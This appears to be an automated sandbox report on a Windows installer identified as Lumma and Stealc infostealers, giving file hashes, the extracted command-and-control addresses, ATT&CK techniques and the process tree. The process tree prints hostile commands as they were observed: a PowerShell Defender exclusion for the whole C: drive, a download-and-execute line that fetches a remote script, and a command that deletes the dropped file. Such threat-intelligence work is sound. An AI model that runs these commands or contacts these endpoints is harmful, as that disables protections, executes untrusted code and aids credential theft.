lumma | b04ea53d801862b98b10c1f83d899fdbb6f8685f02723dc11c26d5aea2abf9ad

Analysis

max time kernel
138s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17/08/2024, 13:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Install_x64.exe
Size

152.8MB
MD5

604062d27cc339e78ea521fe9006d644
SHA1

170592ee65755f0d3dc182cd4868f114654dbf65
SHA256

b04ea53d801862b98b10c1f83d899fdbb6f8685f02723dc11c26d5aea2abf9ad
SHA512

34c4b9d53d09e6a9834dd1188c8ccb98f485478f45707ec17b9f898e2b328e2310d9c7339850b491de442111131c27918ac46eaa9b7001ce3306e7f9fffd2f3b
SSDEEP

786432:dt20SZkMhfqpHCOdRIeoxOTx9ylnEk2Fd7yLie63pk3lLwmYEDz:dtKZkMMi5w9qEn7S6S3zY+

Score

10^/10

lumma stealc mainteam credential_access defense_evasion discovery execution spyware stealer

Malware Config

Extracted

Family

stealc

Botnet

mainteam

http://147.45.47.68

Attributes

url_path
/a8f961c72f0d877c.php

Extracted

Family

lumma

https://samledwwekspzxp.shop/api

https://writerospzm.shop/api

https://deallerospfosu.shop/api

https://bassizcellskz.shop/api

https://languagedscie.shop/api

https://complaintsipzzx.shop/api

https://quialitsuzoxm.shop/api

https://tenntysjuxmz.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 3 IoCs

flow	pid	Process
101	3584	powershell.exe
104	3584	powershell.exe
110	3584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3584	powershell.exe
5060	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1256	1.exe
3800	2.exe
4584	3.exe

Loads dropped DLL 5 IoCs

pid	Process
1976	Install_x64.exe
1976	Install_x64.exe
1976	Install_x64.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
103	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1256 set thread context of 3316	1256	1.exe	111
PID 3800 set thread context of 1696	3800	2.exe	112
PID 4584 set thread context of 3296	4584	3.exe	116

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\launcher289\3.exe	Install_x64.exe
File created	C:\Program Files\launcher289\1.exe	Install_x64.exe
File created	C:\Program Files\launcher289\2.exe	Install_x64.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BitLockerToGo.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
1696	BitLockerToGo.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	1976	Install_x64.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe
Token: SeDebugPrivilege	1688	whoami.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 5060	1976	Install_x64.exe	104
PID 1976 wrote to memory of 5060	1976	Install_x64.exe	104
PID 1976 wrote to memory of 1256	1976	Install_x64.exe	106
PID 1976 wrote to memory of 1256	1976	Install_x64.exe	106
PID 1976 wrote to memory of 3800	1976	Install_x64.exe	110
PID 1976 wrote to memory of 3800	1976	Install_x64.exe	110
PID 1256 wrote to memory of 3316	1256	1.exe	111
PID 1256 wrote to memory of 3316	1256	1.exe	111
PID 1256 wrote to memory of 3316	1256	1.exe	111
PID 1256 wrote to memory of 3316	1256	1.exe	111
PID 1256 wrote to memory of 3316	1256	1.exe	111
PID 3800 wrote to memory of 1696	3800	2.exe	112
PID 3800 wrote to memory of 1696	3800	2.exe	112
PID 3800 wrote to memory of 1696	3800	2.exe	112
PID 3800 wrote to memory of 1696	3800	2.exe	112
PID 3800 wrote to memory of 1696	3800	2.exe	112
PID 1976 wrote to memory of 4584	1976	Install_x64.exe	115
PID 1976 wrote to memory of 4584	1976	Install_x64.exe	115
PID 4584 wrote to memory of 3296	4584	3.exe	116
PID 4584 wrote to memory of 3296	4584	3.exe	116
PID 4584 wrote to memory of 3296	4584	3.exe	116
PID 4584 wrote to memory of 3296	4584	3.exe	116
PID 4584 wrote to memory of 3296	4584	3.exe	116
PID 3296 wrote to memory of 3584	3296	BitLockerToGo.exe	117
PID 3296 wrote to memory of 3584	3296	BitLockerToGo.exe	117
PID 3296 wrote to memory of 3584	3296	BitLockerToGo.exe	117
PID 3296 wrote to memory of 4828	3296	BitLockerToGo.exe	119
PID 3296 wrote to memory of 4828	3296	BitLockerToGo.exe	119
PID 3296 wrote to memory of 4828	3296	BitLockerToGo.exe	119
PID 3584 wrote to memory of 1688	3584	powershell.exe	122
PID 3584 wrote to memory of 1688	3584	powershell.exe	122
PID 3584 wrote to memory of 1688	3584	powershell.exe	122

C:\Users\Admin\AppData\Local\Temp\Install_x64.exe
"C:\Users\Admin\AppData\Local\Temp\Install_x64.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5060
- C:\Program Files\launcher289\1.exe
  "C:\Program Files\launcher289\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1256
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3316
- C:\Program Files\launcher289\2.exe
  "C:\Program Files\launcher289\2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3800
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1696
- C:\Program Files\launcher289\3.exe
  "C:\Program Files\launcher289\3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3296
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/42zzhcyga7s4bd9fnjp33ojb/raw" ) ) )
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3584
    - - C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups /fo csv
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4288,i,5469445176230119590,7931734017267321834,262144 --variations-seed-version --mojo-platform-channel-handle=1040 /prefetch:8
1⤵
PID:4068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2784,i,5469445176230119590,7931734017267321834,262144 --variations-seed-version --mojo-platform-channel-handle=2300 /prefetch:3
1⤵
PID:2732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\launcher289\1.exe

Filesize
14.7MB

MD5
5adc47bd66220da66be8718dad043366

SHA1
c695f75042fff4b70ee5de4bf1b2423f00063fe3

SHA256
758382fde10eee890288cc7fc0bc85c1084121cba661475ffed5e1563da2d672

SHA512
3f89d539c532a025150501115bcd9469006789d48d916856072c9dd7dee314f4f9d8db43b65d3591ac1229fdfaa656d945980de0c65546ae33ff1ddd002ece9c

Download Submit
C:\Program Files\launcher289\2.exe

Filesize
14.7MB

MD5
87df56dc9bd0be55cefb34ba3c0d9722

SHA1
165d874d97709f9ff0ff00c99118928d6c00b3b1

SHA256
41de8f15455692a25a3e4b58ce7343510e2acd156af7558d260ea4cc6cab30cc

SHA512
65a193e57654bb5f04b551b2693812930e7fbcecb096db63d177f254681dd9d5cb139ec759a4123960a4d242031d0f014aed4a87d6a58a35dae656b626f7ac89

Download Submit
C:\Program Files\launcher289\3.exe

Filesize
14.3MB

MD5
c5d969269d4f14988e87cd148d94dade

SHA1
0a7d242d9bd4ca665f030e63b4cb5e9f0c0363ca

SHA256
f9cb138805394c5af90ab786cf1a393e5942a16cc06d06a23ae999e72cfb2f27

SHA512
799b8a363b2b1b5d6b42c54d8e24d2343e49f2c47e158d8887bd08b7f67b9dcbd06d7135de1546f5cd64e864582e75b56058b5de3760cbaf7e927a3e86af6373

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6c47b3f4e68eebd47e9332eebfd2dd4e

SHA1
67f0b143336d7db7b281ed3de5e877fa87261834

SHA256
8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

SHA512
0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\sklkeq11.zzg\D3DCompiler_47_cor3.dll

Filesize
4.7MB

MD5
a7349236212b0e5cec2978f2cfa49a1a

SHA1
5abb08949162fd1985b89ffad40aaf5fc769017e

SHA256
a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082

SHA512
c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\sklkeq11.zzg\PresentationNative_cor3.dll

Filesize
1.2MB

MD5
e67dff697095b778ab6b76229c005811

SHA1
88a54a3e3ff2bf83a76bbf5df8a0e50bdb36bcdc

SHA256
e92b997f6f3a10b43d3fdc7743307228aa3b0a43430af60ccb06efa154d37e6a

SHA512
6f2a2bbbfa0464537fccb53d40239a294dca8fd477e79d70cd9f74079da48525a300675d3b0daae292432adbb9dd099fd4dc95b6fe2794f4c5f3a7e56e15ef51

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\sklkeq11.zzg\wpfgfx_cor3.dll

Filesize
1.9MB

MD5
24ea1814e6701927b9c714e0a4c3c185

SHA1
95c27a6b1f5927e3021cb6f9d5ef5998b2c4560a

SHA256
d2ebedc0004d5e336c6092e417c11c051767c7dcbcb80303f3484fd805e084ae

SHA512
d6c2f32818970d989c834babeac1ce845e832b853ce1c0b3f7ecbfd41331b7d519461bcc0ef07fd35382f263b9e26ac47bb22f0370071913900fc40e3e2656f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cxu2efzh.4fl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1256-39-0x00007FF7C2160000-0x00007FF7C30B5000-memory.dmp

Filesize
15.3MB

Download
memory/1256-44-0x00007FF7C2160000-0x00007FF7C30B5000-memory.dmp

Filesize
15.3MB

Download
memory/1256-33-0x00007FF7C2160000-0x00007FF7C30B5000-memory.dmp

Filesize
15.3MB

Download
memory/1696-52-0x00000000012C0000-0x0000000001503000-memory.dmp

Filesize
2.3MB

Download
memory/1696-51-0x00000000012C0000-0x0000000001503000-memory.dmp

Filesize
2.3MB

Download
memory/1696-54-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/3296-139-0x0000000001210000-0x0000000001233000-memory.dmp

Filesize
140KB

Download
memory/3296-141-0x0000000001210000-0x0000000001233000-memory.dmp

Filesize
140KB

Download
memory/3316-45-0x0000000000AD0000-0x0000000000B2D000-memory.dmp

Filesize
372KB

Download
memory/3316-43-0x0000000000AD0000-0x0000000000B2D000-memory.dmp

Filesize
372KB

Download
memory/3584-160-0x00000000077A0000-0x0000000007E1A000-memory.dmp

Filesize
6.5MB

Download
memory/3584-161-0x0000000006490000-0x00000000064AA000-memory.dmp

Filesize
104KB

Download
memory/3584-269-0x0000000009920000-0x00000000099B2000-memory.dmp

Filesize
584KB

Download
memory/3584-169-0x0000000004CC0000-0x0000000004CD2000-memory.dmp

Filesize
72KB

Download
memory/3584-167-0x0000000009E30000-0x000000000A3D4000-memory.dmp

Filesize
5.6MB

Download
memory/3584-166-0x0000000007650000-0x0000000007672000-memory.dmp

Filesize
136KB

Download
memory/3584-165-0x00000000076A0000-0x0000000007736000-memory.dmp

Filesize
600KB

Download
memory/3584-164-0x0000000008FF0000-0x00000000091B2000-memory.dmp

Filesize
1.8MB

Download
memory/3584-163-0x0000000009350000-0x000000000987C000-memory.dmp

Filesize
5.2MB

Download
memory/3584-142-0x0000000004990000-0x00000000049C6000-memory.dmp

Filesize
216KB

Download
memory/3584-143-0x0000000005040000-0x0000000005668000-memory.dmp

Filesize
6.2MB

Download
memory/3584-144-0x0000000004FC0000-0x0000000004FE2000-memory.dmp

Filesize
136KB

Download
memory/3584-145-0x00000000058A0000-0x0000000005906000-memory.dmp

Filesize
408KB

Download
memory/3584-146-0x0000000005910000-0x0000000005976000-memory.dmp

Filesize
408KB

Download
memory/3584-156-0x0000000005980000-0x0000000005CD4000-memory.dmp

Filesize
3.3MB

Download
memory/3584-162-0x0000000007580000-0x000000000758A000-memory.dmp

Filesize
40KB

Download
memory/3584-158-0x0000000005F50000-0x0000000005F6E000-memory.dmp

Filesize
120KB

Download
memory/3584-159-0x0000000005F90000-0x0000000005FDC000-memory.dmp

Filesize
304KB

Download
memory/3800-46-0x00007FF7EF740000-0x00007FF7F0661000-memory.dmp

Filesize
15.1MB

Download
memory/3800-53-0x00007FF7EF740000-0x00007FF7F0661000-memory.dmp

Filesize
15.1MB

Download
memory/4584-140-0x00007FF6BA450000-0x00007FF6BB338000-memory.dmp

Filesize
14.9MB

Download
memory/4584-138-0x00007FF6BA450000-0x00007FF6BB338000-memory.dmp

Filesize
14.9MB

Download
memory/4584-133-0x00007FF6BA450000-0x00007FF6BB338000-memory.dmp

Filesize
14.9MB

Download
memory/5060-25-0x00007FFC72E90000-0x00007FFC73951000-memory.dmp

Filesize
10.8MB

Download
memory/5060-13-0x00007FFC72E93000-0x00007FFC72E95000-memory.dmp

Filesize
8KB

Download
memory/5060-28-0x00007FFC72E90000-0x00007FFC73951000-memory.dmp

Filesize
10.8MB

Download
memory/5060-19-0x0000023F03570000-0x0000023F03592000-memory.dmp

Filesize
136KB

Download
memory/5060-24-0x00007FFC72E90000-0x00007FFC73951000-memory.dmp

Filesize
10.8MB

Download